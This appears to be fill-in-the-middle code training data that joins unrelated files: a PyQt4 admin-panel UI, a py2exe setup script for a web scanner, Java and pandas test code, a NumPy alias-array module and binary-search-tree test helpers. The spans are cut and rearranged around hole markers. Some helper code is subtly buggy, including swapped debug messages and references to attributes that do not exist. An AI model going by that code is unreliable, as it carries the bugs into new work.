self.label_2.setObjectName(_fromUtf8("label_2"))
self.verticalLayout_2.addWidget(self.label_2)
self.labelServerId = QtGui.QLabel(self.centralwidget)
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(0, 0, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.Text, brush)
brush = QtGui.QBrush(QtGui.QColor(118, 116, 113))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(118, 116, 113))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.Text, brush)
self.labelServerId.setPalette(palette)
font = QtGui.QFont()
font.setPointSize(16)
font.setBold(True)
font.setWeight(75)
self.labelServerId.setFont(font)
self.labelServerId.setAlignment(QtCore.Qt.AlignCenter)
self.labelServerId.setObjectName(_fromUtf8("labelServerId"))
self.verticalLayout_2.addWidget(self.labelServerId)
self.labelYear = QtGui.QLabel(self.centralwidget)
palette = QtGui.QPalette()
brush = QtGui.QBrush(QtGui.QColor(0, 0, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Active, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(0, 0, 255))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Inactive, QtGui.QPalette.WindowText, brush)
brush = QtGui.QBrush(QtGui.QColor(118, 116, 113))
brush.setStyle(QtCore.Qt.SolidPattern)
palette.setBrush(QtGui.QPalette.Disabled, QtGui.QPalette.WindowText, brush)
self.labelYear.setPalette(palette)
font = QtGui.QFont()
font.setPointSize(37)
font.setBold(True)
font.setWeight(75)
self.labelYear.setFont(font)
self.labelYear.setTextFormat(QtCore.Qt.PlainText)
self.labelYear.setAlignment(QtCore.Qt.AlignCenter)
self.labelYear.setObjectName(_fromUtf8("labelYear"))
self.verticalLayout_2.addWidget(self.labelYear)
self.horizontalLayout_2.addLayout(self.verticalLayout_2)
self.label = QtGui.QLabel(self.centralwidget)
self.label.setMaximumSize(QtCore.QSize(200, 200))
self.label.setText(_fromUtf8(""))
self.label.setPixmap(QtGui.QPixmap(_fromUtf8(":/logo/pixmaps/Stampa-silicone-tondo-fi55.png")))
self.label.setScaledContents(True)
self.label.setObjectName(_fromUtf8("label"))
self.horizontalLayout_2.addWidget(self.label)
self.verticalLayout.addLayout(self.horizontalLayout_2)
self.line = QtGui.QFrame(self.centralwidget)
self.line.setFrameShadow(QtGui.QFrame.Raised)
self.line.setLineWidth(4)
self.line.setFrameShape(QtGui.QFrame.HLine)
self.line.setFrameShadow(QtGui.QFrame.Sunken)
self.line.setObjectName(_fromUtf8("line"))
self.verticalLayout.addWidget(self.line)
spacerItem = QtGui.QSpacerItem(20, 40, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
self.verticalLayout.addItem(spacerItem)
self.horizontalLayout = QtGui.QHBoxLayout()
self.horizontalLayout.setObjectName(_fromUtf8("horizontalLayout"))
self.btnNewYear = QtGui.QToolButton(self.centralwidget)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Maximum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(11)
sizePolicy.setHeightForWidth(self.btnNewYear.sizePolicy().hasHeightForWidth())
self.btnNewYear.setSizePolicy(sizePolicy)
self.btnNewYear.setMinimumSize(QtCore.QSize(0, 200))
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.btnNewYear.setFont(font)
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap(_fromUtf8(":/img/pixmaps/planner.png")), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.btnNewYear.setIcon(icon)
self.btnNewYear.setIconSize(QtCore.QSize(128, 128))
self.btnNewYear.setToolButtonStyle(QtCore.Qt.ToolButtonTextUnderIcon)
self.btnNewYear.setAutoRaise(False)
self.btnNewYear.setArrowType(QtCore.Qt.NoArrow)
self.btnNewYear.setObjectName(_fromUtf8("btnNewYear"))
self.horizontalLayout.addWidget(self.btnNewYear)
self.btnCloseYear = QtGui.QToolButton(self.centralwidget)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(11)
sizePolicy.setHeightForWidth(self.btnCloseYear.sizePolicy().hasHeightForWidth())
self.btnCloseYear.setSizePolicy(sizePolicy)
self.btnCloseYear.setMinimumSize(QtCore.QSize(0, 200))
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.btnCloseYear.setFont(font)
self.btnCloseYear.setAutoFillBackground(False)
icon1 = QtGui.QIcon()
icon1.addPixmap(QtGui.QPixmap(_fromUtf8(":/img/pixmaps/save.png")), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.btnCloseYear.setIcon(icon1)
self.btnCloseYear.setIconSize(QtCore.QSize(128, 128))
self.btnCloseYear.setToolButtonStyle(QtCore.Qt.ToolButtonTextUnderIcon)
self.btnCloseYear.setObjectName(_fromUtf8("btnCloseYear"))
self.horizontalLayout.addWidget(self.btnCloseYear)
self.btnTeachers = QtGui.QToolButton(self.centralwidget)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Maximum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(11)
sizePolicy.setHeightForWidth(self.btnTeachers.sizePolicy().hasHeightForWidth())
self.btnTeachers.setSizePolicy(sizePolicy)
self.btnTeachers.setMinimumSize(QtCore.QSize(0, 200))
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.btnTeachers.setFont(font)
icon2 = QtGui.QIcon()
icon2.addPixmap(QtGui.QPixmap(_fromUtf8(":/img/pixmaps/education.png")), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.btnTeachers.setIcon(icon2)
self.btnTeachers.setIconSize(QtCore.QSize(128, 128))
self.btnTeachers.setToolButtonStyle(QtCore.Qt.ToolButtonTextUnderIcon)
self.btnTeachers.setObjectName(_fromUtf8("btnTeachers"))
self.horizontalLayout.addWidget(self.btnTeachers)
self.btnStudents = QtGui.QToolButton(self.centralwidget)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Maximum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(11)
sizePolicy.setHeightForWidth(self.btnStudents.sizePolicy().hasHeightForWidth())
self.btnStudents.setSizePolicy(sizePolicy)
self.btnStudents.setMinimumSize(QtCore.QSize(0, 200))
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.btnStudents.setFont(font)
self.btnStudents.setStyleSheet(_fromUtf8(""))
icon3 = QtGui.QIcon()
icon3.addPixmap(QtGui.QPixmap(_fromUtf8(":/img/pixmaps/System-users.png")), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.btnStudents.setIcon(icon3)
self.btnStudents.setIconSize(QtCore.QSize(128, 128))
self.btnStudents.setToolButtonStyle(QtCore.Qt.ToolButtonTextUnderIcon)
self.btnStudents.setObjectName(_fromUtf8("btnStudents"))
self.horizontalLayout.addWidget(self.btnStudents)
self.btnAdvanced = QtGui.QToolButton(self.centralwidget)
sizePolicy = QtGui.QSizePolicy(QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Maximum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(11)
sizePolicy.setHeightForWidth(self.btnAdvanced.sizePolicy().hasHeightForWidth())
self.btnAdvanced.setSizePolicy(sizePolicy)
self.btnAdvanced.setMinimumSize(QtCore.QSize(0, 200))
font = QtGui.QFont()
font.setBold(True)
font.setWeight(75)
self.btnAdvanced.setFont(font)<|fim▁hole|> icon4.addPixmap(QtGui.QPixmap(_fromUtf8(":/img/pixmaps/advanced_options.png")), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.btnAdvanced.setIcon(icon4)
self.btnAdvanced.setIconSize(QtCore.QSize(128, 128))
self.btnAdvanced.setToolButtonStyle(QtCore.Qt.ToolButtonTextUnderIcon)
self.btnAdvanced.setObjectName(_fromUtf8("btnAdvanced"))
self.horizontalLayout.addWidget(self.btnAdvanced)
self.verticalLayout.addLayout(self.horizontalLayout)
spacerItem1 = QtGui.QSpacerItem(20, 40, QtGui.QSizePolicy.Minimum, QtGui.QSizePolicy.Expanding)
self.verticalLayout.addItem(spacerItem1)
MainWindow.setCentralWidget(self.centralwidget)
self.statusbar = QtGui.QStatusBar(MainWindow)
self.statusbar.setObjectName(_fromUtf8("statusbar"))
MainWindow.setStatusBar(self.statusbar)
self.menubar = QtGui.QMenuBar(MainWindow)
self.menubar.setGeometry(QtCore.QRect(0, 0, 1024, 29))
self.menubar.setObjectName(_fromUtf8("menubar"))
self.menuImpostazioni = QtGui.QMenu(self.menubar)
self.menuImpostazioni.setEnabled(False)
self.menuImpostazioni.setObjectName(_fromUtf8("menuImpostazioni"))
self.menuHelp = QtGui.QMenu(self.menubar)
self.menuHelp.setEnabled(False)
self.menuHelp.setObjectName(_fromUtf8("menuHelp"))
self.menuArchivi = QtGui.QMenu(self.menubar)
self.menuArchivi.setObjectName(_fromUtf8("menuArchivi"))
MainWindow.setMenuBar(self.menubar)
self.actionAbout = QtGui.QAction(MainWindow)
self.actionAbout.setObjectName(_fromUtf8("actionAbout"))
self.actionPreferenze = QtGui.QAction(MainWindow)
self.actionPreferenze.setObjectName(_fromUtf8("actionPreferenze"))
self.actionArchivioAnniPrec = QtGui.QAction(MainWindow)
self.actionArchivioAnniPrec.setObjectName(_fromUtf8("actionArchivioAnniPrec"))
self.menuImpostazioni.addAction(self.actionPreferenze)
self.menuHelp.addAction(self.actionAbout)
self.menuArchivi.addAction(self.actionArchivioAnniPrec)
self.menubar.addAction(self.menuArchivi.menuAction())
self.menubar.addAction(self.menuImpostazioni.menuAction())
self.menubar.addAction(self.menuHelp.menuAction())
self.retranslateUi(MainWindow)
QtCore.QObject.connect(self.btnAdvanced, QtCore.SIGNAL(_fromUtf8("clicked()")), MainWindow.execAdvancedUserManager)
QtCore.QObject.connect(self.btnCloseYear, QtCore.SIGNAL(_fromUtf8("clicked()")), MainWindow.execYearEnd)
QtCore.QObject.connect(self.btnNewYear, QtCore.SIGNAL(_fromUtf8("clicked()")), MainWindow.execYearNew)
QtCore.QObject.connect(self.actionArchivioAnniPrec, QtCore.SIGNAL(_fromUtf8("triggered()")), MainWindow.showArchBackup)
QtCore.QObject.connect(self.btnStudents, QtCore.SIGNAL(_fromUtf8("clicked()")), MainWindow.showStudentsManager)
QtCore.QObject.connect(self.btnTeachers, QtCore.SIGNAL(_fromUtf8("clicked()")), MainWindow.showTeachersManager)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
    def retranslateUi(self, MainWindow):
        """Apply (re-)translated user-visible strings to every widget.

        Generated by pyuic4; called from setupUi and again whenever the
        application language changes. Only widget texts/titles are set
        here -- layout and signal wiring live in setupUi.
        """
        MainWindow.setWindowTitle(QtGui.QApplication.translate("MainWindow", "MainWindow", None, QtGui.QApplication.UnicodeUTF8))
        self.label_2.setText(QtGui.QApplication.translate("MainWindow", "Pannello di Amministrazione del Server", None, QtGui.QApplication.UnicodeUTF8))
        self.labelServerId.setText(QtGui.QApplication.translate("MainWindow", "TextLabel", None, QtGui.QApplication.UnicodeUTF8))
        self.labelYear.setText(QtGui.QApplication.translate("MainWindow", "Anno -", None, QtGui.QApplication.UnicodeUTF8))
        self.btnNewYear.setText(QtGui.QApplication.translate("MainWindow", "Nuovo Anno", None, QtGui.QApplication.UnicodeUTF8))
        self.btnCloseYear.setText(QtGui.QApplication.translate("MainWindow", "Chiusura Anno", None, QtGui.QApplication.UnicodeUTF8))
        self.btnTeachers.setText(QtGui.QApplication.translate("MainWindow", "Gestione Insegnanti", None, QtGui.QApplication.UnicodeUTF8))
        self.btnStudents.setText(QtGui.QApplication.translate("MainWindow", "Gestione Alunni", None, QtGui.QApplication.UnicodeUTF8))
        self.btnAdvanced.setText(QtGui.QApplication.translate("MainWindow", "Gestione Avanzata", None, QtGui.QApplication.UnicodeUTF8))
        self.menuImpostazioni.setTitle(QtGui.QApplication.translate("MainWindow", "Impostazioni", None, QtGui.QApplication.UnicodeUTF8))
        self.menuHelp.setTitle(QtGui.QApplication.translate("MainWindow", "Help", None, QtGui.QApplication.UnicodeUTF8))
        self.menuArchivi.setTitle(QtGui.QApplication.translate("MainWindow", "Archivi", None, QtGui.QApplication.UnicodeUTF8))
        self.actionAbout.setText(QtGui.QApplication.translate("MainWindow", "About", None, QtGui.QApplication.UnicodeUTF8))
        self.actionPreferenze.setText(QtGui.QApplication.translate("MainWindow", "Preferenze", None, QtGui.QApplication.UnicodeUTF8))
        self.actionArchivioAnniPrec.setText(QtGui.QApplication.translate("MainWindow", "Archivio anni precedenti", None, QtGui.QApplication.UnicodeUTF8))
import classerman_rc<|fim▁end|> | icon4 = QtGui.QIcon() |
<|file_name|>winsetup.py<|end_file_name|><|fim▁begin|>from distutils.core import setup
import py2exe
# py2exe build options: one compressed, bytecode-optimized, single-file
# executable (bundle_files=1) written to ./dist. "ascii": 1 together with an
# explicit "encodings" package is the usual py2exe pairing -- ascii mode drops
# the codec machinery, so "encodings" is re-added by hand; verify against the
# py2exe version in use.
opts = {
    "py2exe": {
        "compressed": 1,
        "optimize": 2,
        "ascii": 1,
        "bundle_files": 1,
        "packages": ["encodings"],
        "dist_dir": "dist"
    }
}
setup (name = "Gomoz",
fullname = "Gomoz web scanner",
version = "1.0.1",
description = "Gomoz scanner web application",<|fim▁hole|> license = "GPL",
keywords = ["scanner", "web application", "securfox", "wxPython"],
windows = [{"script": "gomoz"}],
options = opts,
zipfile = None
)<|fim▁end|> | author = "Handrix",
author_email = "[email protected]",
url = "http://www.sourceforge.net/projects/gomoz/", |
<|file_name|>ScheduleCreateInput.java<|end_file_name|><|fim▁begin|>/*
* Copyright 2015-2018 the original author or authors.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
package io.pivotal.strepsirrhini.chaosloris.web;
import com.fasterxml.jackson.annotation.JsonCreator;
import com.fasterxml.jackson.annotation.JsonProperty;
import javax.validation.constraints.NotNull;
/**
* Input for schedule creation<|fim▁hole|>
@NotNull
private final String expression;
@NotNull
private final String name;
@JsonCreator
ScheduleCreateInput(@JsonProperty("expression") String expression, @JsonProperty("name") String name) {
this.expression = expression;
this.name = name;
}
String getExpression() {
return this.expression;
}
String getName() {
return this.name;
}
}<|fim▁end|> | */
public final class ScheduleCreateInput { |
<|file_name|>alias.py<|end_file_name|><|fim▁begin|>import numpy as np
from scipy.sparse import csr_matrix
class AliasArray(np.ndarray):
    """An ndarray with a mapping of values to user-friendly names -- see example

    This ndarray subclass enables comparing sub_id and hop_id arrays directly with
    their friendly string identifiers. The mapping parameter translates sublattice
    or hopping names into their number IDs.

    Only the `==` and `!=` operators are overloaded to handle the aliases.

    Examples
    --------
    >>> a = AliasArray([0, 1, 0], mapping={"A": 0, "B": 1})
    >>> list(a == 0)
    [True, False, True]
    >>> list(a == "A")
    [True, False, True]
    >>> list(a != "A")
    [False, True, False]
    >>> a = AliasArray([0, 1, 0, 2], mapping={"A|1": 0, "B": 1, "A|2": 2})
    >>> list(a == "A")
    [True, False, True, True]
    >>> list(a != "A")
    [False, True, False, False]
    """
    def __new__(cls, array, mapping):
        obj = np.asarray(array).view(cls)
        # SplitName keys make "first|second" aliases also match on "first" alone.
        obj.mapping = {SplitName(k): v for k, v in mapping.items()}
        return obj

    def __array_finalize__(self, obj):
        # Called by numpy for every new view/copy; propagate the mapping so
        # slices and ufunc results keep their aliases.
        if obj is None:
            return
        self.mapping = getattr(obj, "mapping", None)

    def _mapped_eq(self, other):
        """Element-wise equality against the alias name `other` (a str)."""
        if other in self.mapping:
            # Exact key: compare against its single mapped ID.
            return super().__eq__(self.mapping[other])
        else:
            # Partial name (e.g. "A" matching "A|1" and "A|2"): OR together
            # the comparisons for every key whose first part matches.
            # BUGFIX: `np.bool` was deprecated in NumPy 1.20 and removed in
            # 1.24 -- use the builtin `bool` dtype instead.
            result = np.zeros(len(self), dtype=bool)
            for k, v in self.mapping.items():
                if k == other:
                    result = np.logical_or(result, super().__eq__(v))
            return result

    def __eq__(self, other):
        if isinstance(other, str):
            return self._mapped_eq(other)
        else:
            return super().__eq__(other)

    def __ne__(self, other):
        if isinstance(other, str):
            return np.logical_not(self._mapped_eq(other))
        else:
            return super().__ne__(other)
# noinspection PyAbstractClass
class AliasCSRMatrix(csr_matrix):
    """Same as :class:`AliasArray` but for a CSR matrix

    Examples
    --------
    >>> from scipy.sparse import spdiags
    >>> m = AliasCSRMatrix(spdiags([1, 2, 1], [0], 3, 3), mapping={'A': 1, 'B': 2})
    >>> list(m.data == 'A')
    [True, False, True]
    >>> list(m.tocoo().data == 'A')
    [True, False, True]
    >>> list(m[:2].data == 'A')
    [True, False]
    """
    def __init__(self, *args, **kwargs):
        # Accept `mapping` as a keyword, or inherit it from the source matrix
        # (e.g. another AliasCSRMatrix) when none is given explicitly.
        mapping = kwargs.pop('mapping', {})
        if not mapping:
            mapping = getattr(args[0], 'mapping', {})
        super().__init__(*args, **kwargs)
        # Wrap the raw data array so element comparisons accept alias names.
        self.data = AliasArray(self.data, mapping)
    @property
    def format(self):
        # scipy identifies sparse matrix types via `format`; report plain
        # 'csr' so this subclass is treated like a regular CSR matrix.
        return 'csr'
    @format.setter
    def format(self, _):
        # scipy's constructor assigns `format`; swallow the write so the
        # read-only 'csr' answer above is preserved.
        pass
    @property
    def mapping(self):
        # The mapping lives on the wrapped data array (see __init__).
        return self.data.mapping
    def tocoo(self, *args, **kwargs):
        # Re-wrap the COO data array so the alias mapping survives conversion.
        coo = super().tocoo(*args, **kwargs)
        coo.data = AliasArray(coo.data, mapping=self.mapping)
        return coo
    def __getitem__(self, item):
        # Slicing returns a plain csr_matrix; re-wrap it. Non-CSR results
        # (scalars, dense arrays) are returned unchanged.
        result = super().__getitem__(item)
        if getattr(result, 'format', '') == 'csr':
            return AliasCSRMatrix(result, mapping=self.mapping)
        else:
            return result
class AliasIndex:
"""An all-or-nothing array index based on equality with a specific value
The `==` and `!=` operators are overloaded to return a lazy array which is either
all `True` or all `False`. See the examples below. This is useful for modifiers
where the each call gets arrays with the same sub_id/hop_id for all elements.
Instead of passing an `AliasArray` with `.size` identical element, `AliasIndex`
does the same all-or-nothing indexing.
Examples
--------
>>> l = np.array([1, 2, 3])
>>> ai = AliasIndex("A", len(l))
>>> list(l[ai == "A"])
[1, 2, 3]
>>> list(l[ai == "B"])
[]
>>> list(l[ai != "A"])
[]
>>> list(l[ai != "B"])
[1, 2, 3]
>>> np.logical_and([True, False, True], ai == "A")
array([ True, False, True], dtype=bool)
>>> np.logical_and([True, False, True], ai != "A")
array([False, False, False], dtype=bool)
>>> bool(ai == "A")
True
>>> bool(ai != "A")
False
>>> str(ai)
'A'
>>> hash(ai) == hash("A")
True
>>> int(ai.eye)
1
>>> np.allclose(AliasIndex("A", 1, (2, 2)).eye, np.eye(2))
True
"""
class LazyArray:
def __init__(self, value, shape):
self.value = value
self.shape = shape
def __bool__(self):
return bool(self.value)<|fim▁hole|> return np.full(self.shape, self.value)
def __init__(self, name, shape, orbs=(1, 1)):
self.name = name
self.shape = shape
self.orbs = orbs
def __str__(self):
return self.name
def __eq__(self, other):
return self.LazyArray(self.name == other, self.shape)
def __ne__(self, other):
return self.LazyArray(self.name != other, self.shape)
def __hash__(self):
return hash(self.name)
@property
def eye(self):
return np.eye(*self.orbs)
class SplitName(str):
"""String subclass with special support for strings of the form "first|second"
Operators `==` and `!=` are overloaded to return `True` even if only the first part matches.
Examples
--------
>>> s = SplitName("first|second")
>>> s == "first|second"
True
>>> s != "first|second"
False
>>> s == "first"
True
>>> s != "first"
False
>>> s == "second"
False
>>> s != "second"
True
"""
@property
def first(self):
return self.split("|")[0]
def __eq__(self, other):
return super().__eq__(other) or self.first == other
def __ne__(self, other):
return super().__ne__(other) and self.first != other
def __hash__(self):
return super().__hash__()<|fim▁end|> |
def __array__(self): |
<|file_name|>PersBug_src.cpp<|end_file_name|><|fim▁begin|>#include "Ht.h"
#include "PersBug.h"
void
CPersBug::PersBug()
{
if (PR_htValid) {
switch (PR_htInst) {
case BUG_RTN: {
if (SendReturnBusy_htmain()) {
HtRetry();
break;
}
SendReturn_htmain();
}
break;
default:<|fim▁hole|>}<|fim▁end|> | assert(0);
}
} |
<|file_name|>test_filter_totals_from_share_results.py<|end_file_name|><|fim▁begin|>from datetime import timedelta
from unittest import TestCase
import pandas as pd
import pandas.testing
from fireant.dataset.modifiers import Rollup
from fireant.dataset.totals import scrub_totals_from_share_results
from fireant.tests.dataset.mocks import (
dimx0_metricx2_df,
dimx1_str_df,
dimx1_str_totals_df,
dimx2_date_str_df,
dimx2_date_str_totals_df,
dimx2_date_str_totalsx2_df,
mock_dataset,
)
TIMESTAMP_UPPERBOUND = pd.Timestamp.max - timedelta(seconds=1)
class ScrubTotalsTests(TestCase):
def ignore_dimensionless_result_sets(self):
result = scrub_totals_from_share_results(dimx0_metricx2_df, [])
expected = dimx0_metricx2_df
pandas.testing.assert_frame_equal(result, expected)
def test_remove_totals_for_non_rollup_dimensions(self):
result = scrub_totals_from_share_results(dimx1_str_totals_df, [mock_dataset.fields.political_party])
expected = dimx1_str_df
pandas.testing.assert_frame_equal(result, expected)
def test_remove_totals_for_non_rollup_dimensions_with_multiindex(self):
result = scrub_totals_from_share_results(
dimx2_date_str_totals_df, [mock_dataset.fields.timestamp, mock_dataset.fields.political_party]
)
expected = dimx2_date_str_df
<|fim▁hole|> def test_remove_totals_for_non_rollup_dimensions_with_multiindex_and_multiple_totals(self):
result = scrub_totals_from_share_results(
dimx2_date_str_totalsx2_df, [mock_dataset.fields.timestamp, mock_dataset.fields.political_party]
)
expected = dimx2_date_str_df
pandas.testing.assert_frame_equal(result, expected)
def test_do_not_remove_totals_for_rollup_dimensions(self):
result = scrub_totals_from_share_results(dimx1_str_totals_df, [Rollup(mock_dataset.fields.political_party)])
expected = dimx1_str_totals_df
pandas.testing.assert_frame_equal(result, expected)
def test_do_not_remove_totals_for_rollup_dimensions_with_multiindex(self):
result = scrub_totals_from_share_results(
dimx2_date_str_totals_df, [mock_dataset.fields.timestamp, Rollup(mock_dataset.fields.political_party)]
)
expected = dimx2_date_str_totals_df
pandas.testing.assert_frame_equal(result, expected)
def test_do_not_remove_totals_for_rollup_dimensions_with_multiindex_and_lower_dimension_totals(self):
result = scrub_totals_from_share_results(
dimx2_date_str_totalsx2_df, [mock_dataset.fields.timestamp, Rollup(mock_dataset.fields.political_party)]
)
expected = dimx2_date_str_totalsx2_df.loc[:TIMESTAMP_UPPERBOUND]
pandas.testing.assert_frame_equal(result, expected)
def test_do_not_remove_totals_for_rollup_dimensions_with_multiindex_and_higher_dimension_totals(self):
result = scrub_totals_from_share_results(
dimx2_date_str_totalsx2_df, [Rollup(mock_dataset.fields.timestamp), mock_dataset.fields.political_party]
)
expected = dimx2_date_str_totalsx2_df.loc[(slice(None), slice('Democrat', 'Republican')), :].append(
dimx2_date_str_totalsx2_df.iloc[-1]
)
pandas.testing.assert_frame_equal(result, expected)
def test_do_not_remove_totals_for_rollup_dimensions_with_multiindex_and_all_rolled_up(self):
result = scrub_totals_from_share_results(
dimx2_date_str_totalsx2_df,
[Rollup(mock_dataset.fields.timestamp), Rollup(mock_dataset.fields.political_party)],
)
expected = dimx2_date_str_totalsx2_df
pandas.testing.assert_frame_equal(result, expected)<|fim▁end|> | pandas.testing.assert_frame_equal(result, expected)
|
<|file_name|>test_binary_search_trees.py<|end_file_name|><|fim▁begin|># import data_structures.binary_search_trees.rope as rope
import data_structures.binary_search_trees.set_range_sum as set_range_sum
import data_structures.binary_search_trees.tree_orders as tree_orders
import pytest
import os
import sys
import resource
CI = os.environ.get('CI') == 'true'
# Helpers
class BinarySearchTree:
    """Minimal unbalanced binary search tree used as a test helper.

    Keys must be mutually orderable; ``put`` on an existing key replaces its
    payload. Iteration yields payloads in ascending key order.
    """

    def __init__(self):
        self.root = None  # TreeNode or None
        self.size = 0     # number of distinct keys currently stored

    def length(self):
        return self.size

    def __len__(self):
        return self.size

    def __iter__(self):
        # BUGFIX: previously delegated to self.root.__iter__(), which raised
        # AttributeError (root may be None and nodes define no __iter__).
        # Do an in-order traversal here instead; safe on an empty tree.
        yield from self._iter_node(self.root)

    @staticmethod
    def _iter_node(node):
        """Yield payloads of the subtree rooted at ``node`` in key order."""
        if node is None:
            return
        yield from BinarySearchTree._iter_node(node.left_child)
        yield node.payload
        yield from BinarySearchTree._iter_node(node.right_child)

    def get(self, key):
        """Return the payload stored under ``key``, or None if absent."""
        if self.root:
            res = self.find(key, self.root)
            if res and res.key == key:
                return res.payload
        return None

    def find(self, key, node):
        """Return the node holding ``key``, or the node under which ``key``
        would be inserted (never None when called with a valid node)."""
        if node.key == key:
            return node
        if key < node.key:
            if not node.has_left_child():
                return node
            return self.find(key, node.left_child)
        else:
            if not node.has_right_child():
                return node
            return self.find(key, node.right_child)

    def __getitem__(self, key):
        return self.get(key)

    def __contains__(self, key):
        # BUGFIX: compare keys, not payloads -- a falsy payload (0, "", None)
        # must not make its key look absent (the old code truth-tested get()).
        if self.root is None:
            return False
        return self.find(key, self.root).key == key

    def put(self, key, val):
        """Insert ``key`` -> ``val``, replacing the payload if ``key`` exists.

        BUGFIX: ``size`` is now incremented only when a genuinely new node is
        created (replacing an existing key previously inflated the count), and
        the stray debug prints -- whose messages were also swapped -- are gone.
        """
        if self.root:
            if self._put(key, val, self.root):
                self.size += 1
        else:
            self.root = TreeNode(key, val)
            self.size += 1

    def _put(self, key, val, node):
        """Insert below ``node``; return True iff a new node was created."""
        _parent = self.find(key, node)
        if _parent.key == key:  # already exists, replace values
            _parent.replace_node_data(key, val, _parent.left_child,
                                      _parent.right_child)
            return False
        # find() guarantees the child slot on key's side of _parent is free.
        if key < _parent.key:
            assert not _parent.has_left_child()
            _parent.left_child = TreeNode(key, val, parent=_parent)
        else:
            assert not _parent.has_right_child()
            _parent.right_child = TreeNode(key, val, parent=_parent)
        return True

    def __setitem__(self, k, v):
        """Allows usage of []."""
        self.put(k, v)
class TreeNode:
def __init__(self, key, val, left=None, right=None, parent=None):
self.key = key
self.payload = val
self.left_child = left
self.right_child = right
self.parent = parent
def has_left_child(self):
return self.left_child
def has_right_child(self):
return self.right_child
def is_left_child(self):
return self.parent and self.parent.leftChild == self
def is_right_child(self):
return self.parent and self.parent.rightChild == self
def is_root(self):
return not self.parent
def is_leaf(self):
return not (self.right_child or self.left_child)
<|fim▁hole|> return self.right_child or self.left_child
def has_both_children(self):
return self.right_child and self.left_child
def replace_node_data(self, key, value, lc, rc):
self.key = key
self.payload = value
self.left_child = lc
self.right_child = rc
if self.has_left_child():
self.left_child.parent = self
if self.has_right_child():
self.right_child.parent = self
@pytest.mark.timeout(6)
class TestTreeOrders:
    """Sample-based checks for tree_orders.TreeOrders traversal orders."""
    @classmethod
    def setup_class(cls):
        """ setup any state specific to the execution of the given class (which
        usually contains tests).
        """
        # Traversals recurse once per tree level; raise the interpreter and OS
        # stack limits so deep (degenerate) trees do not overflow.
        sys.setrecursionlimit(10 ** 6)  # max depth of recursion
        resource.setrlimit(resource.RLIMIT_STACK, (2 ** 27, 2 ** 27))
    # Each case: node count, per-node key, left/right child indices
    # (-1 = no child), then the expected in-/pre-/post-order key sequences.
    @pytest.mark.parametrize("n,key,left,right,exp_inorder,exp_preorder,exp_postorder", [
        (5,
         [4, 2, 5, 1, 3],
         [1, 3, -1, -1, -1],
         [2, 4, -1, -1, -1],
         [1, 2, 3, 4, 5], [4, 2, 1, 3, 5], [1, 3, 2, 5, 4]),
        (10,
         [0, 10, 20, 30, 40, 50, 60, 70, 80, 90],
         [7, -1, -1, 8, 3, -1, 1, 5, -1, -1],
         [2, -1, 6, 9, -1, -1, -1, 4, -1, -1],
         [50, 70, 80, 30, 90, 40, 0, 20, 10, 60],
         [0, 70, 50, 40, 30, 80, 90, 20, 60, 10],
         [50, 80, 90, 30, 40, 70, 10, 60, 20, 0])
    ])
    def test_samples(self, n,key,left,right,exp_inorder,exp_preorder,exp_postorder):
        tree = tree_orders.TreeOrders(n, key, left, right)
        assert exp_inorder == tree.order(tree.in_order)
        assert exp_preorder == tree.order(tree.pre_order)
        assert exp_postorder == tree.order(tree.post_order)
@pytest.mark.timeout(120)
class TestSetRangeSum:
@classmethod
def setup_class(cls):
""" setup any state specific to the execution of the given class (which
usually contains tests).
"""
del set_range_sum.root
